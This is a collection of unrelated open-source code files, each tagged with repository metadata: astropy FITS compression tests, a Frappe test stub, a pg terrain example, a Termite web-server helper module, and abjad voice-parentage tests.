assert np.isclose(np.max(im1 - im3), 50, atol=1e-1)
def test_comp_image_hcompression_1_invalid_data(self):
"""
Tests compression with the HCOMPRESS_1 algorithm with data that is
not 2D and has a non-2D tile size.
"""
pytest.raises(ValueError, fits.CompImageHDU,
np.zeros((2, 10, 10), dtype=np.float32), name='SCI',
compression_type='HCOMPRESS_1', quantize_level=16,
tile_size=[2, 10, 10])
def test_comp_image_hcompress_image_stack(self):
"""
Regression test for https://aeon.stsci.edu/ssb/trac/pyfits/ticket/171
Tests that data containing more than two dimensions can be
compressed with HCOMPRESS_1 so long as the user-supplied tile size can
be flattened to two dimensions.
"""
cube = np.arange(300, dtype=np.float32).reshape(3, 10, 10)
hdu = fits.CompImageHDU(data=cube, name='SCI',
compression_type='HCOMPRESS_1',
quantize_level=16, tile_size=[5, 5, 1])
hdu.writeto(self.temp('test.fits'))
with fits.open(self.temp('test.fits')) as hdul:
# HCOMPRESSed images are allowed to deviate from the original by
# about 1/quantize_level of the RMS in each tile.
assert np.abs(hdul['SCI'].data - cube).max() < 1./15.
def test_subtractive_dither_seed(self):
"""
Regression test for https://github.com/spacetelescope/PyFITS/issues/32
Ensure that when floating point data is compressed with the
SUBTRACTIVE_DITHER_1 quantization method that the correct ZDITHER0 seed
is added to the header, and that the data can be correctly
decompressed.
"""
array = np.arange(100.0).reshape(10, 10)
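# Expected ZDITHER0 seed for DITHER_SEED_CHECKSUM: the byte sum of the
# first row (the first tile under the default row-by-row tiling) modulo
# 10000, plus 1.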
csum = (array[0].view('uint8').sum() % 10000) + 1
hdu = fits.CompImageHDU(data=array,
quantize_method=SUBTRACTIVE_DITHER_1,
dither_seed=DITHER_SEED_CHECKSUM)
hdu.writeto(self.temp('test.fits'))
with fits.open(self.temp('test.fits')) as hdul:
assert isinstance(hdul[1], fits.CompImageHDU)
assert 'ZQUANTIZ' in hdul[1]._header
assert hdul[1]._header['ZQUANTIZ'] == 'SUBTRACTIVE_DITHER_1'
assert 'ZDITHER0' in hdul[1]._header
assert hdul[1]._header['ZDITHER0'] == csum
assert np.all(hdul[1].data == array)
def test_disable_image_compression(self):
with catch_warnings():
# No warnings should be displayed in this case
warnings.simplefilter('error')
with fits.open(self.data('comp.fits'),
disable_image_compression=True) as hdul:
# The compressed image HDU should show up as a BinTableHDU, but
# *not* a CompImageHDU
assert isinstance(hdul[1], fits.BinTableHDU)
assert not isinstance(hdul[1], fits.CompImageHDU)
with fits.open(self.data('comp.fits')) as hdul:
assert isinstance(hdul[1], fits.CompImageHDU)
def test_open_comp_image_in_update_mode(self):
"""
Regression test for https://aeon.stsci.edu/ssb/trac/pyfits/ticket/167
Similar to test_open_scaled_in_update_mode(), but specifically for
compressed images.
"""
# Copy the original file before making any possible changes to it
self.copy_file('comp.fits')
mtime = os.stat(self.temp('comp.fits')).st_mtime
time.sleep(1)
fits.open(self.temp('comp.fits'), mode='update').close()
# Ensure that no changes were made to the file merely by immediately
# opening and closing it.
assert mtime == os.stat(self.temp('comp.fits')).st_mtime
def test_open_scaled_in_update_mode_compressed(self):
"""
Regression test for https://aeon.stsci.edu/ssb/trac/pyfits/ticket/88 2
Identical to test_open_scaled_in_update_mode() but with a compressed
version of the scaled image.
"""
# Copy+compress the original file before making any possible changes to
# it
with fits.open(self.data('scale.fits'),
do_not_scale_image_data=True) as hdul:
chdu = fits.CompImageHDU(data=hdul[0].data,
header=hdul[0].header)
chdu.writeto(self.temp('scale.fits'))
mtime = os.stat(self.temp('scale.fits')).st_mtime
time.sleep(1)
fits.open(self.temp('scale.fits'), mode='update').close()
# Ensure that no changes were made to the file merely by immediately
# opening and closing it.
assert mtime == os.stat(self.temp('scale.fits')).st_mtime
# Insert a slight delay to ensure the mtime does change when the file
# is changed
time.sleep(1)
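# Simply accessing the data in update mode applies BSCALE/BZERO, so the
# rescaled float data is written back to the file when it is closed.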
hdul = fits.open(self.temp('scale.fits'), 'update')
hdul[1].data
hdul.close()
# Now the file should be updated with the rescaled data
assert mtime != os.stat(self.temp('scale.fits')).st_mtime
hdul = fits.open(self.temp('scale.fits'), mode='update')
assert hdul[1].data.dtype == np.dtype('float32')
assert hdul[1].header['BITPIX'] == -32
assert 'BZERO' not in hdul[1].header
assert 'BSCALE' not in hdul[1].header
# Try reshaping the data, then closing and reopening the file; let's
# see if all the changes are preserved properly
hdul[1].data.shape = (42, 10)
hdul.close()
hdul = fits.open(self.temp('scale.fits'))
assert hdul[1].shape == (42, 10)
assert hdul[1].data.dtype == np.dtype('float32')
assert hdul[1].header['BITPIX'] == -32
assert 'BZERO' not in hdul[1].header
assert 'BSCALE' not in hdul[1].header
hdul.close()
def test_write_comp_hdu_direct_from_existing(self):
with fits.open(self.data('comp.fits')) as hdul:
hdul[1].writeto(self.temp('test.fits'))
with fits.open(self.data('comp.fits')) as hdul1:
with fits.open(self.temp('test.fits')) as hdul2:
assert np.all(hdul1[1].data == hdul2[1].data)
assert comparerecords(hdul1[1].compressed_data,
hdul2[1].compressed_data)
def test_rewriting_large_scaled_image_compressed(self):
"""
Regression test for https://aeon.stsci.edu/ssb/trac/pyfits/ticket/88 1
Identical to test_rewriting_large_scaled_image() but with a compressed
image.
"""
with fits.open(self.data('fixed-1890.fits'),
do_not_scale_image_data=True) as hdul:
chdu = fits.CompImageHDU(data=hdul[0].data,
header=hdul[0].header)
chdu.writeto(self.temp('fixed-1890-z.fits'))
hdul = fits.open(self.temp('fixed-1890-z.fits'))
orig_data = hdul[1].data
with ignore_warnings():
hdul.writeto(self.temp('test_new.fits'), overwrite=True)
hdul.close()
hdul = fits.open(self.temp('test_new.fits'))
assert (hdul[1].data == orig_data).all()
hdul.close()
# Just as before, but this time don't touch hdul[0].data before writing
# back out--this is the case that failed in
# https://aeon.stsci.edu/ssb/trac/pyfits/ticket/84
hdul = fits.open(self.temp('fixed-1890-z.fits'))
with ignore_warnings():
hdul.writeto(self.temp('test_new.fits'), overwrite=True)
hdul.close()
hdul = fits.open(self.temp('test_new.fits'))
assert (hdul[1].data == orig_data).all()
hdul.close()
# Test opening/closing/reopening a scaled file in update mode
hdul = fits.open(self.temp('fixed-1890-z.fits'),
do_not_scale_image_data=True)
hdul.writeto(self.temp('test_new.fits'), overwrite=True,
output_verify='silentfix')
hdul.close()
hdul = fits.open(self.temp('test_new.fits'))
orig_data = hdul[1].data
hdul.close()
hdul = fits.open(self.temp('test_new.fits'), mode='update')
hdul.close()
hdul = fits.open(self.temp('test_new.fits'))
assert (hdul[1].data == orig_data).all()
hdul = fits.open(self.temp('test_new.fits'))
hdul.close()
def test_scale_back_compressed(self):
"""
Regression test for https://aeon.stsci.edu/ssb/trac/pyfits/ticket/88 3
Identical to test_scale_back() but uses a compressed image.
"""
# Create a compressed version of the scaled image
with fits.open(self.data('scale.fits'),
do_not_scale_image_data=True) as hdul:
chdu = fits.CompImageHDU(data=hdul[0].data,
header=hdul[0].header)
chdu.writeto(self.temp('scale.fits'))
with fits.open(self.temp('scale.fits'), mode='update',
scale_back=True) as hdul:
orig_bitpix = hdul[1].header['BITPIX']
orig_bzero = hdul[1].header['BZERO']
orig_bscale = hdul[1].header['BSCALE']
orig_data = hdul[1].data.copy()
hdul[1].data[0] = 0
with fits.open(self.temp('scale.fits'),
do_not_scale_image_data=True) as hdul:
assert hdul[1].header['BITPIX'] == orig_bitpix
assert hdul[1].header['BZERO'] == orig_bzero
assert hdul[1].header['BSCALE'] == orig_bscale
zero_point = int(math.floor(-orig_bzero / orig_bscale))
assert (hdul[1].data[0] == zero_point).all()
with fits.open(self.temp('scale.fits')) as hdul:
assert (hdul[1].data[1:] == orig_data[1:]).all()
# Extra test to ensure that after everything the data is still the
# same as in the original uncompressed version of the image
with fits.open(self.data('scale.fits')) as hdul2:
# Recall we made the same modification to the data in hdul
# above
hdul2[0].data[0] = 0
assert (hdul[1].data == hdul2[0].data).all()
def test_lossless_gzip_compression(self):
"""Regression test for https://aeon.stsci.edu/ssb/trac/pyfits/ticket/198"""
rng = np.random.RandomState(seed=42)
noise = rng.normal(size=(20, 20))
chdu1 = fits.CompImageHDU(data=noise, compression_type='GZIP_1')
# First make a test image with lossy compression and make sure it
# wasn't compressed perfectly. This shouldn't happen ever, but just to
# make sure the test is non-trivial.
chdu1.writeto(self.temp('test.fits'))
with fits.open(self.temp('test.fits')) as h:
assert np.abs(noise - h[1].data).max() > 0.0
del h
chdu2 = fits.CompImageHDU(data=noise, compression_type='GZIP_1',
quantize_level=0.0) # No quantization
with ignore_warnings():
chdu2.writeto(self.temp('test.fits'), overwrite=True)
with fits.open(self.temp('test.fits')) as h:
assert (noise == h[1].data).all()
def test_compression_column_tforms(self):
"""Regression test for https://aeon.stsci.edu/ssb/trac/pyfits/ticket/199"""
# Some interestingly tiled data so that some of it is quantized and
# some of it ends up just getting gzip-compressed
data2 = ((np.arange(1, 8, dtype=np.float32) * 10)[:, np.newaxis] +
np.arange(1, 7))
np.random.seed(1337)
data1 = np.random.uniform(size=(6 * 4, 7 * 4))
data1[:data2.shape[0], :data2.shape[1]] = data2
chdu = fits.CompImageHDU(data1, compression_type='RICE_1',
tile_size=(6, 7))
chdu.writeto(self.temp('test.fits'))
with fits.open(self.temp('test.fits'),
disable_image_compression=True) as h:
assert re.match(r'^1PB\(\d+\)$', h[1].header['TFORM1'])
assert re.match(r'^1PB\(\d+\)$', h[1].header['TFORM2'])
def test_compression_update_header(self):
"""Regression test for
https://github.com/spacetelescope/PyFITS/issues/23
"""
self.copy_file('comp.fits')
with fits.open(self.temp('comp.fits'), mode='update') as hdul:
assert isinstance(hdul[1], fits.CompImageHDU)
hdul[1].header['test1'] = 'test'
hdul[1]._header['test2'] = 'test2'
with fits.open(self.temp('comp.fits')) as hdul:
assert 'test1' in hdul[1].header
assert hdul[1].header['test1'] == 'test'
assert 'test2' in hdul[1].header
assert hdul[1].header['test2'] == 'test2'
# Test update via index now:
with fits.open(self.temp('comp.fits'), mode='update') as hdul:
hdr = hdul[1].header
hdr[hdr.index('TEST1')] = 'foo'
with fits.open(self.temp('comp.fits')) as hdul:
assert hdul[1].header['TEST1'] == 'foo'
# Test slice updates
with fits.open(self.temp('comp.fits'), mode='update') as hdul:
hdul[1].header['TEST*'] = 'qux'
with fits.open(self.temp('comp.fits')) as hdul:
assert list(hdul[1].header['TEST*'].values()) == ['qux', 'qux']
with fits.open(self.temp('comp.fits'), mode='update') as hdul:
hdr = hdul[1].header
idx = hdr.index('TEST1')
hdr[idx:idx + 2] = 'bar'
with fits.open(self.temp('comp.fits')) as hdul:
assert list(hdul[1].header['TEST*'].values()) == ['bar', 'bar']
# Test updating a specific COMMENT card duplicate
with fits.open(self.temp('comp.fits'), mode='update') as hdul:
hdul[1].header[('COMMENT', 1)] = 'I am fire. I am death!'
with fits.open(self.temp('comp.fits')) as hdul:
assert hdul[1].header['COMMENT'][1] == 'I am fire. I am death!'
assert hdul[1]._header['COMMENT'][1] == 'I am fire. I am death!'
# Test deleting by keyword and by slice
with fits.open(self.temp('comp.fits'), mode='update') as hdul:
hdr = hdul[1].header
del hdr['COMMENT']
idx = hdr.index('TEST1')
del hdr[idx:idx + 2]
with fits.open(self.temp('comp.fits')) as hdul:
assert 'COMMENT' not in hdul[1].header
assert 'COMMENT' not in hdul[1]._header
assert 'TEST1' not in hdul[1].header
assert 'TEST1' not in hdul[1]._header
assert 'TEST2' not in hdul[1].header
assert 'TEST2' not in hdul[1]._header
def test_compression_update_header_with_reserved(self):
"""
Ensure that setting reserved keywords related to the table data
structure on CompImageHDU image headers fails.
"""
def test_set_keyword(hdr, keyword, value):
with catch_warnings() as w:
hdr[keyword] = value
assert len(w) == 1
assert str(w[0].message).startswith(
f"Keyword {keyword!r} is reserved")
assert keyword not in hdr
with fits.open(self.data('comp.fits')) as hdul:
hdr = hdul[1].header
test_set_keyword(hdr, 'TFIELDS', 8)
test_set_keyword(hdr, 'TTYPE1', 'Foo')
test_set_keyword(hdr, 'ZCMPTYPE', 'ASDF')
test_set_keyword(hdr, 'ZVAL1', 'Foo')
def test_compression_header_append(self):
with fits.open(self.data('comp.fits')) as hdul:
imghdr = hdul[1].header
tblhdr = hdul[1]._header
with catch_warnings() as w:
imghdr.append('TFIELDS')
assert len(w) == 1
assert 'TFIELDS' not in imghdr
imghdr.append(('FOO', 'bar', 'qux'), end=True)
assert 'FOO' in imghdr
assert imghdr[-1] == 'bar'
assert 'FOO' in tblhdr
assert tblhdr[-1] == 'bar'
imghdr.append(('CHECKSUM', 'abcd1234'))
assert 'CHECKSUM' in imghdr
assert imghdr['CHECKSUM'] == 'abcd1234'
assert 'CHECKSUM' not in tblhdr
assert 'ZHECKSUM' in tblhdr
assert tblhdr['ZHECKSUM'] == 'abcd1234'
def test_compression_header_append2(self):
"""
Regression test for issue https://github.com/astropy/astropy/issues/5827
"""
with fits.open(self.data('comp.fits')) as hdul:
header = hdul[1].header
while (len(header) < 1000):
header.append() # pad with grow room
# Append stats to header:
header.append(("Q1_OSAVG", 1, "[adu] quadrant 1 overscan mean"))
header.append(("Q1_OSSTD", 1, "[adu] quadrant 1 overscan stddev"))
header.append(("Q1_OSMED", 1, "[adu] quadrant 1 overscan median"))
def test_compression_header_insert(self):
with fits.open(self.data('comp.fits')) as hdul:
imghdr = hdul[1].header
tblhdr = hdul[1]._header
# First try inserting a restricted keyword
with catch_warnings() as w:
imghdr.insert(1000, 'TFIELDS')
assert len(w) == 1
assert 'TFIELDS' not in imghdr
assert tblhdr.count('TFIELDS') == 1
# First try keyword-relative insert
imghdr.insert('TELESCOP', ('OBSERVER', 'Phil Plait'))
assert 'OBSERVER' in imghdr
assert imghdr.index('OBSERVER') == imghdr.index('TELESCOP') - 1
assert 'OBSERVER' in tblhdr
assert tblhdr.index('OBSERVER') == tblhdr.index('TELESCOP') - 1
# Next let's see if an index-relative insert winds up being
# sensible
idx = imghdr.index('OBSERVER')
imghdr.insert('OBSERVER', ('FOO',))
assert 'FOO' in imghdr
assert imghdr.index('FOO') == idx
assert 'FOO' in tblhdr
assert tblhdr.index('FOO') == tblhdr.index('OBSERVER') - 1
def test_compression_header_set_before_after(self):
with fits.open(self.data('comp.fits')) as hdul:
imghdr = hdul[1].header
tblhdr = hdul[1]._header
with catch_warnings() as w:
imghdr.set('ZBITPIX', 77, 'asdf', after='XTENSION')
assert len(w) == 1
assert 'ZBITPIX' not in imghdr
assert tblhdr.count('ZBITPIX') == 1
assert tblhdr['ZBITPIX'] != 77
# Move GCOUNT before PCOUNT (not that there's any reason you'd
# *want* to do that, but it's just a test...)
imghdr.set('GCOUNT', 99, before='PCOUNT')
assert imghdr.index('GCOUNT') == imghdr.index('PCOUNT') - 1
assert imghdr['GCOUNT'] == 99
assert tblhdr.index('ZGCOUNT') == tblhdr.index('ZPCOUNT') - 1
assert tblhdr['ZGCOUNT'] == 99
assert tblhdr.index('PCOUNT') == 5
assert tblhdr.index('GCOUNT') == 6
assert tblhdr['GCOUNT'] == 1
imghdr.set('GCOUNT', 2, after='PCOUNT')
assert imghdr.index('GCOUNT') == imghdr.index('PCOUNT') + 1
assert imghdr['GCOUNT'] == 2
assert tblhdr.index('ZGCOUNT') == tblhdr.index('ZPCOUNT') + 1
assert tblhdr['ZGCOUNT'] == 2
assert tblhdr.index('PCOUNT') == 5
assert tblhdr.index('GCOUNT') == 6
assert tblhdr['GCOUNT'] == 1
def test_compression_header_append_commentary(self):
"""
Regression test for https://github.com/astropy/astropy/issues/2363
"""
hdu = fits.CompImageHDU(np.array([0], dtype=np.int32))
hdu.header['COMMENT'] = 'hello world'
assert hdu.header['COMMENT'] == ['hello world']
hdu.writeto(self.temp('test.fits'))
with fits.open(self.temp('test.fits')) as hdul:
assert hdul[1].header['COMMENT'] == ['hello world']
def test_compression_with_gzip_column(self):
"""
Regression test for https://github.com/spacetelescope/PyFITS/issues/71
"""
arr = np.zeros((2, 7000), dtype='float32')
# The first row (which will be the first compressed tile) has a very
# wide range of values that will be difficult to quantize, and should
# result in use of a GZIP_COMPRESSED_DATA column
arr[0] = np.linspace(0, 1, 7000)
arr[1] = np.random.normal(size=7000)
hdu = fits.CompImageHDU(data=arr)
hdu.writeto(self.temp('test.fits'))
with fits.open(self.temp('test.fits')) as hdul:
comp_hdu = hdul[1]
# GZIP-compressed tile should compare exactly
assert np.all(comp_hdu.data[0] == arr[0])
# The second tile uses lossy compression and may be somewhat off,
# so we don't bother comparing it exactly
def test_duplicate_compression_header_keywords(self):
"""
Regression test for https://github.com/astropy/astropy/issues/2750
Tests that the fake header (for the compressed image) can still be read
even if the real header contained a duplicate ZTENSION keyword (the
issue applies to any keyword specific to the compression convention,
however).
"""
arr = np.arange(100, dtype=np.int32)
hdu = fits.CompImageHDU(data=arr)
header = hdu._header
# append the duplicate keyword
hdu._header.append(('ZTENSION', 'IMAGE'))
hdu.writeto(self.temp('test.fits'))
with fits.open(self.temp('test.fits')) as hdul:
assert header == hdul[1]._header
# There's no good reason to have a duplicate keyword, but
# technically it isn't invalid either :/
assert hdul[1]._header.count('ZTENSION') == 2
def test_scale_bzero_with_compressed_int_data(self):
"""
Regression test for https://github.com/astropy/astropy/issues/4600
and https://github.com/astropy/astropy/issues/4588
Identical to test_scale_bzero_with_int_data() but uses a compressed
image.
"""
a = np.arange(100, 200, dtype=np.int16)
hdu1 = fits.CompImageHDU(data=a.copy())
hdu2 = fits.CompImageHDU(data=a.copy())
# Previously the following line would throw a TypeError,
# now it should be identical to the integer bzero case
hdu1.scale('int16', bzero=99.0)
hdu2.scale('int16', bzero=99)
assert np.allclose(hdu1.data, hdu2.data)
def test_scale_back_compressed_uint_assignment(self):
"""
Extend fix for #4600 to assignment to data
Identical to test_scale_back_uint_assignment() but uses a compressed
image.
Suggested by:
https://github.com/astropy/astropy/pull/4602#issuecomment-208713748
"""
a = np.arange(100, 200, dtype=np.uint16)
fits.CompImageHDU(a).writeto(self.temp('test.fits'))
with fits.open(self.temp('test.fits'), mode="update",
scale_back=True) as hdul:
hdul[1].data[:] = 0
assert np.allclose(hdul[1].data, 0)
def test_compressed_header_missing_znaxis(self):
a = np.arange(100, 200, dtype=np.uint16)
comp_hdu = fits.CompImageHDU(a)
comp_hdu._header.pop('ZNAXIS')
with pytest.raises(KeyError):
comp_hdu.compressed_data
comp_hdu = fits.CompImageHDU(a)
comp_hdu._header.pop('ZBITPIX')
with pytest.raises(KeyError):
comp_hdu.compressed_data
@pytest.mark.parametrize(
('keyword', 'dtype', 'expected'),
[('BSCALE', np.uint8, np.float32), ('BSCALE', np.int16, np.float32),
('BSCALE', np.int32, np.float64), ('BZERO', np.uint8, np.float32),
('BZERO', np.int16, np.float32), ('BZERO', np.int32, np.float64)])
def test_compressed_scaled_float(self, keyword, dtype, expected):
"""
If BSCALE,BZERO is set to floating point values, the image
should be floating-point.
https://github.com/astropy/astropy/pull/6492
Parameters
----------
keyword : `str`
Keyword to set to a floating-point value to trigger
floating-point pixels.
dtype : `numpy.dtype`
Type of original array.
expected : `numpy.dtype`
Expected type of uncompressed array.
"""
value = 1.23345 # A floating-point value
hdu = fits.CompImageHDU(np.arange(0, 10, dtype=dtype))
hdu.header[keyword] = value
hdu.writeto(self.temp('test.fits'))
del hdu
with fits.open(self.temp('test.fits')) as hdu:
assert hdu[1].header[keyword] == value
assert hdu[1].data.dtype == expected
@pytest.mark.parametrize('dtype', (np.uint8, np.int16, np.uint16, np.int32,
np.uint32))
def test_compressed_integers(self, dtype):
"""Test that the various integer dtypes are correctly written and read.
Regression test for https://github.com/astropy/astropy/issues/9072
"""
mid = np.iinfo(dtype).max // 2
data = np.arange(mid-50, mid+50, dtype=dtype)
testfile = self.temp('test.fits')
hdu = fits.CompImageHDU(data=data)
hdu.writeto(testfile, overwrite=True)
new = fits.getdata(testfile)
np.testing.assert_array_equal(data, new)
def test_comphdu_bscale(tmpdir):
"""
Regression test for a bug where extensions that used BZERO and BSCALE,
once converted to CompImageHDU, ended up with BZERO/BSCALE placed before
TFIELDS.
"""
filename1 = tmpdir.join('3hdus.fits').strpath
filename2 = tmpdir.join('3hdus_comp.fits').strpath
x = np.random.random((100, 100))*100
x0 = fits.PrimaryHDU()
x1 = fits.ImageHDU(np.array(x-50, dtype=int), uint=True)
x1.header['BZERO'] = 20331
x1.header['BSCALE'] = 2.3
hdus = fits.HDUList([x0, x1])
hdus.writeto(filename1)
# fitsverify (based on cfitsio) should fail on this file, only seeing the
# first HDU.
with fits.open(filename1) as hdus:
hdus[1] = fits.CompImageHDU(data=hdus[1].data.astype(np.uint32),
header=hdus[1].header)
hdus.writeto(filename2)
# open again and verify
with fits.open(filename2) as hdus:
hdus[1].verify('exception')
def test_scale_implicit_casting():
# Regression test for an issue that occurred because Numpy now does not
# allow implicit type casting during inplace operations.
hdu = fits.ImageHDU(np.array([1], dtype=np.int32))
hdu.scale(bzero=1.3)
def test_bzero_implicit_casting_compressed():
# Regression test for an issue that occurred because Numpy now does not
# allow implicit type casting during inplace operations. Astropy is
# actually not able to produce a file that triggers the failure - the
# issue occurs when using unsigned integer types in the FITS file, in which
# case BZERO should be 32768. But if the keyword is stored as 32768.0, then
# it was possible to trigger the implicit casting error.
filename = os.path.join(os.path.dirname(__file__),
'data', 'compressed_float_bzero.fits')
with fits.open(filename) as hdul:
hdu = hdul[1]
hdu.data
def test_bzero_mishandled_info(tmpdir):
# Regression test for #5507:
# Calling HDUList.info() on a dataset which applies a zeropoint
# from BZERO but which astropy.io.fits does not think it needs
# to resize to a new dtype results in an AttributeError.
filename = tmpdir.join('floatimg_with_bzero.fits').strpath
hdu = fits.ImageHDU(np.zeros((10, 10)))
hdu.header['BZERO'] = 10
hdu.writeto(filename, overwrite=True)
with fits.open(filename) as hdul:
hdul.info()
def test_image_write_readonly(tmpdir):
# Regression test to make sure that we can write out read-only arrays (#5512)
x = np.array([1, 2, 3])
x.setflags(write=False)
ghdu = fits.ImageHDU(data=x)
ghdu.add_datasum()
filename = tmpdir.join('test.fits').strpath
ghdu.writeto(filename)
with fits.open(filename) as hdulist:
assert_equal(hdulist[1].data, [1, 2, 3])
# Same for compressed HDU
x = np.array([1.0, 2.0, 3.0])
x.setflags(write=False)
ghdu = fits.CompImageHDU(data=x)
# add_datasum does not work for CompImageHDU
# ghdu.add_datasum()
filename = tmpdir.join('test2.fits').strpath
ghdu.writeto(filename)
with fits.open(filename) as hdulist:
assert_equal(hdulist[1].data, [1.0, 2.0, 3.0])
| MSeifert04/astropy | astropy/io/fits/tests/test_image.py | Python | bsd-3-clause | 76,391 | 0.000406 |
# -*- coding: utf-8 -*-
# Copyright (c) 2017, sathishpy@gmail.com and Contributors
# See license.txt
from __future__ import unicode_literals
import frappe
import unittest
class TestCMPaperManagement(unittest.TestCase):
pass
| sathishpy/corrugation | corrugation/corrugation/doctype/cm_paper_management/test_cm_paper_management.py | Python | gpl-3.0 | 227 | 0.008811 |
from collections import defaultdict
import colorsys
import pg
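# Terrain height: a low-frequency simplex octave scaled up for the large
# hills plus a small high-frequency term for fine surface detail.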
def noise(x, z):
a = pg.simplex2(-x * 0.01, -z * 0.01, 4)
b = pg.simplex2(x * 0.1, z * 0.1, 4)
return (a + 1) * 16 + b / 10
def generate_color(x, z):
m = 0.005
h = (pg.simplex2(x * m, z * m, 4) + 1) / 2
s = (pg.simplex2(-x * m, z * m, 4) + 1) / 2
v = (pg.simplex2(x * m, -z * m, 4) + 1) / 2
v = v * 0.5 + 0.5
return colorsys.hsv_to_rgb(h, s, v)
class Window(pg.Window):
def setup(self):
self.wasd = pg.WASD(self, speed=30)
self.wasd.look_at((-20, 20, -8), (0, 0, 0))
self.context = pg.Context(pg.DirectionalLightProgram())
self.context.use_color = True
self.context.specular_power = 8.0
self.context.specular_multiplier = 0.3
normals = defaultdict(list)
position = []
normal = []
color = []
size = 50
# generate height map
height = {}
colors = {}
for x in xrange(-size, size + 1):
for z in xrange(-size, size + 1):
height[(x, z)] = noise(x, z)
colors[(x, z)] = generate_color(x, z)
# generate triangles and track normals for all vertices
for x in xrange(-size, size):
for z in xrange(-size, size):
t1 = [x + 0, z + 0, x + 1, z + 0, x + 0, z + 1]
t2 = [x + 0, z + 1, x + 1, z + 0, x + 1, z + 1]
for t in [t1, t2]:
x1, z1, x2, z2, x3, z3 = t
p1 = (x1, height[(x1, z1)], z1)
p2 = (x2, height[(x2, z2)], z2)
p3 = (x3, height[(x3, z3)], z3)
c1 = colors[(x1, z1)]
c2 = colors[(x2, z2)]
c3 = colors[(x3, z3)]
position.extend([p3, p2, p1])
color.extend([c3, c2, c1])
n = pg.normalize(pg.cross(pg.sub(p3, p1), pg.sub(p2, p1)))
normals[(x1, z1)].append(n)
normals[(x2, z2)].append(n)
normals[(x3, z3)].append(n)
# compute average normal for all vertices
for key, value in normals.items():
normals[key] = pg.normalize(reduce(pg.add, value))
for x, y, z in position:
normal.append(normals[(x, z)])
# generate vertex buffer
vb = pg.VertexBuffer(pg.interleave(position, normal, color))
self.context.position, self.context.normal, self.context.color = (
vb.slices(3, 3, 3))
def update(self, t, dt):
matrix = pg.Matrix()
matrix = self.wasd.get_matrix(matrix)
matrix = matrix.perspective(65, self.aspect, 0.1, 1000)
self.context.matrix = matrix
self.context.camera_position = self.wasd.position
def draw(self):
self.clear()
self.context.draw()
if __name__ == "__main__":
pg.run(Window)
| kbrafford/pg | examples/terrain.py | Python | mit | 2,927 | 0.00205 |
#!/usr/bin/env python
import os
import json
class TermiteCore:
def __init__( self, request, response ):
self.request = request
self.response = response
def GetConfigs( self ):
def GetServer():
return self.request.env['HTTP_HOST']
def GetDataset():
return self.request.application
def GetModel():
return self.request.controller
def GetAttribute():
return self.request.function
def GetDatasets( dataset ):
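# A dataset corresponds to an application folder under the applications/
# directory, excluding the framework's built-in apps in FOLDER_EXCLUSIONS.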
FOLDER_EXCLUSIONS = frozenset( [ 'admin', 'examples', 'welcome', 'init' ] )
applications_parent = self.request.env['applications_parent']
applications_path = '{}/applications'.format( applications_parent )
folders = []
for folder in os.listdir( applications_path ):
applications_subpath = '{}/{}'.format( applications_path, folder )
if os.path.isdir( applications_subpath ):
if folder not in FOLDER_EXCLUSIONS:
folders.append( folder )
folders = sorted( folders )
return folders
def GetModels( dataset, model ):
if dataset == 'init':
return None
app_data_path = '{}/data'.format( self.request.folder )
folders = []
for folder in os.listdir( app_data_path ):
app_data_subpath = '{}/{}'.format( app_data_path, folder )
if os.path.isdir( app_data_subpath ):
folders.append( folder )
folders = sorted( folders )
return folders
def GetAttributes( dataset, model, attribute ):
if dataset == 'init':
return None
if model == 'default':
return None
if model == 'lda':
return [
'DocIndex',
'TermIndex',
'TopicIndex',
'TermTopicMatrix',
'DocTopicMatrix',
'TopicCooccurrence'
]
elif model == 'corpus':
return [
'DocMeta',
'TermFreqs',
'TermCoFreqs'
]
else:
return []
server = GetServer()
dataset = GetDataset()
datasets = GetDatasets( dataset )
model = GetModel()
models = GetModels( dataset, model )
attribute = GetAttribute()
attributes = GetAttributes( dataset, model, attribute )
configs = {
'server' : server,
'dataset' : dataset,
'datasets' : datasets,
'model' : model,
'models' : models,
'attribute' : attribute,
'attributes' : attributes
}
return configs
def IsDebugMode( self ):
return 'debug' in self.request.vars
def IsJsonFormat( self ):
return 'format' in self.request.vars and 'json' == self.request.vars['format'].lower()
def GenerateResponse( self, params = {}, keysAndValues = {} ):
if self.IsDebugMode():
return self.GenerateDebugResponse()
else:
return self.GenerateNormalResponse( params, keysAndValues )
def GenerateDebugResponse( self ):
def GetEnv( env ):
data = {}
for key in env:
value = env[key]
if isinstance( value, dict ) or \
isinstance( value, list ) or isinstance( value, tuple ) or \
isinstance( value, str ) or isinstance( value, unicode ) or \
isinstance( value, int ) or isinstance( value, long ) or isinstance( value, float ) or \
value is None or value is True or value is False:
data[ key ] = value
else:
data[ key ] = 'N/A'
return data
info = {
'env' : GetEnv( self.request.env ),
'cookies' : self.request.cookies,
'vars' : self.request.vars,
'get_vars' : self.request.get_vars,
'post_vars' : self.request.post_vars,
'folder' : self.request.folder,
'application' : self.request.application,
'controller' : self.request.controller,
'function' : self.request.function,
'args' : self.request.args,
'extension' : self.request.extension,
'now' : str( self.request.now )
}
return json.dumps( info, encoding = 'utf-8', indent = 2, sort_keys = True )
def GenerateNormalResponse( self, params, keysAndValues = {} ):
data = {
'params' : params,
'configs' : self.GetConfigs()
}
data.update( keysAndValues )
dataStr = json.dumps( data, encoding = 'utf-8', indent = 2, sort_keys = True )
# Workaround while we build up the server-client architecture
self.response.headers['Access-Control-Allow-Origin'] = 'http://' + self.request.env['REMOTE_ADDR'] + ':8080'
if self.IsJsonFormat():
return dataStr
else:
data[ 'content' ] = dataStr
return data
| jyt109/termite-data-server | server_src/modules/core.py | Python | bsd-3-clause | 4,206 | 0.07204 |
# -*- encoding: utf-8 -*-
from abjad import *
import pytest
def test_selectiontools_Parentage_logical_voice_01():
r'''An anonymous staff and its contained unvoiced leaves share
the same signature.
'''
staff = Staff("c'8 d'8 e'8 f'8")
containment = inspect_(staff).get_parentage().logical_voice
for component in iterate(staff).by_class():
assert inspect_(component).get_parentage().logical_voice == containment
def test_selectiontools_Parentage_logical_voice_02():
r'''A named staff and its contained unvoiced leaves share
the same signature.
'''
staff = Staff("c'8 d'8 e'8 f'8")
staff.name = 'foo'
containment = inspect_(staff).get_parentage().logical_voice
for component in iterate(staff).by_class():
assert inspect_(component).get_parentage().logical_voice == containment
def test_selectiontools_Parentage_logical_voice_03():
r'''Leaves inside equally named sequential voices inside a staff
share the same signature.
'''
staff = Staff(Voice("c'8 d'8 e'8 f'8") * 2)
staff[0].name = 'foo'
staff[1].name = 'foo'
containment = inspect_(staff[0][0]).get_parentage().logical_voice
for leaf in staff.select_leaves():
assert inspect_(leaf).get_parentage().logical_voice == containment
